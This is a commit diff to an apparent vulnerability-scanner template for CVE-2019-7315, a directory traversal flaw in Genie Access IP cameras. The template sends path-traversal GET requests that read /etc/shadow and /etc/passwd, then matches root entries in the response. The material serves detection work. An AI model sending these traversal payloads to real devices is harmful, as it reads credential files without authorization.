Update and rename CVE-2019-7315.yaml to cves/2019/CVE-2019-7315.yaml

patch-1
Prince Chaddha 2022-06-23 23:59:11 +05:30 committed by GitHub
parent bc098be2c0
commit bd121e999e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 8 deletions

View File

@ -5,28 +5,28 @@ info:
severity: high
description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow.
reference:
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
- https://vuldb.com/?id.136593
- https://www.cvedetails.com/cve/CVE-2019-7315
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-7315
cwe-id: CWE-22
tags: cve,cve2019,camera,genie,lfi
tags: cve,cve2019,camera,genie,lfi,iot
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../etc/shadow"
- "{{BaseURL}}/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200